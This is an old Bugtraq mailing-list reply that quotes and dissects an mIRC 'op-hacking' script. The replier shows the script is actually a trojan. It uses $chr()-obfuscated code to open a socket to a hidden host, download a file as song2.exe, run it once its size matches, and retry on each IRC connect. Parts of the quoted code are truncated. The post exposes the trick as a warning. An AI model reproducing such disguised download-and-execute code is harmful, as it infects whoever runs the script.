[8558] in bugtraq
No subject found in mail header
daemon@ATHENA.MIT.EDU (Cacaio Torquato)
Sat Nov 14 20:18:34 1998
Date: Sat, 14 Nov 1998 19:37:29 -0200
Reply-To: Cacaio Torquato <cacaio@DEATHKNIGHTS.COM>
From: Cacaio Torquato <cacaio@DEATHKNIGHTS.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199811131950.OAA02949@brampton1.netmatrix.net>
At 14:50 13/11/98 -0500, root@BRAMPTON1.NETMATRIX.NET wrote:
>Hi,
>while debugging/hexing/disassembling mirc my friend slotmech last week found
>a mirc bug which allows to force users to send MODE commands to the server.
>this example script sends a MODE +o to the irc server. the mirc author has
been
>notified of this but we didn't receive a response... my exploit+protection
scri$is included. Expect more mirc stuff from us.
>
>
Are you nutz man? Your code simple makes whoever wants to get op get a file
in your server and execute it. I'm glad you weren't smart enough to place
the full address of your server.
For the ones who wants to know exactly what's happening, I will explain
step by step the code.
Your attempt to install your file in everyone that want to hack ops was
funny, just funny...
>alias hackop {
>...
> checklen $1
>...
>}
call the function checklen - see below
>
>alias checklen {
> .if (%xcomplete == 1) halt
> .if (%xinprog == 1) halt
> .set %xfilename song2.exe
> .set %xlof $lof(%xfilename)
> .set %xfirst 1
> .write -c %xfilename
sets the filename to song2.exe, and clear it if something is on it already.
> ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104
101 - 1$ .sockclose protx
if this line is uncommented, it displays in the screen the following message:
d o n t - s p o i l - t h e
> .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
$chr$}
opens a sock connection with the server designed. the one placed in his
hode is www.g (i think he forgot the rest)
>on 1:sockopen:protx: {
> .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+
$chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47)
$+ $chr(57) $+ $c$ .sockwrite -n protx
>}
when this sock connection is oppened, he send the request 'GET /Belta/9' to
the server and start receiving data
>on 1:sockread:protx: {
> .sockread &test
> .set %xlof $lof(%xfilename)
> .if (%xfirst == 1) set %xlof 0
> .set %xfirst 0
> .bwrite %xfilename %xlof $sockbr &test
>}
just receive the data and make it a file
>on 1:connect:checklen
why is it here? because when the user connects to the irc server, the
script will grab the file again, and again and again.
>on 1:sockclose:protx: {
> .sockread &test
> if ($sockbr > 0) {
> .set %xlof $lof(%xfilename)
> .bwrite %xfilename %xlof $sockbr &test
> }
finish writting file
> .if ($lof(%xfilename) == 178306) {
> .run %xfilename
> .set %xcomplete 1
> }
if the site of the file, in bytes, is equal to 178306, runs the file
> if ($lof(%xfilename) != 178306) {
> .timer 1 300 checklen
> }
if the site of the file, in bytes, is minor to 178306, starts a timer that
in 300 seconds will get the file again
> }
> unset %xinprog
> unset %xfilename
> unset %xlof
> unset %xfirst
>}
>
unset the garbage variables
-----------
that's it
Best regards,
--
Cacaio Torquato http://www.deathknights.com/cacaio
The Death Knights http://www.deathknights.com zelur xuniL () -O)
Tedio INC. http://www.tedio.org Think Blue. /\ /\\
_\_V
+-------------------------------------------------------+
| BrasNet IRC Servers Network - Brazil |
| irc.brasnet.org irc.webtech.com.br |
| irc.sol.com.br |
+-------------------------------------------------------+